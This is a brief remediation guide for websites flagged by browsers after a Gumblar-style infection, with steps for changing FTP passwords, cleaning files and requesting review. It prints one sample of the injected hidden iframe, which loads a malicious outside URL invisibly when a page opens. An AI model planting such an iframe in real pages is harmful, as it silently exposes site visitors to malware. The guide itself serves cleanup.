This attack alert is displayed in many browsers in your site is infected with hidden iframe or javascript virus.
Its also known as Gumblar / Gumbler attack. This is generally caused when the machine you / your developer are using to upload the files is infected and passwords are saved in cuteftp or any other ftp client.
When ever html / php files are uploaded through ftp, the virus inserts a hidden iframe or javascript which has a link to some banned sites. Due to this browsers block your site at it has links to dangerous / blocked sites.
Follow the steps in sequence to get the alert removed from your site.
- Remove all saved passwords on your infected computer and don’t save them until you get your entire system scanned and virus are removed.
- Change your ftp passwords
- Remove the hidden iframe tags from all the files
sample of infected hidden iframe tags :-<iframe frameborder="0" onload="if (!this.src){ this.height='0' ; this.src='http://supernil.ru:8080/index.php'; this.width='0';}"> 1258180561co3 </iframe> - Remove any obfuscated / jumbled javascript from your webpages.
- Upload all cleaned files.
- Submit your site for review at :- http://www.stopbadware.org/home/reportsearch
- They will review your site and remove the site once they are sure that there is no infected code in your webpage.
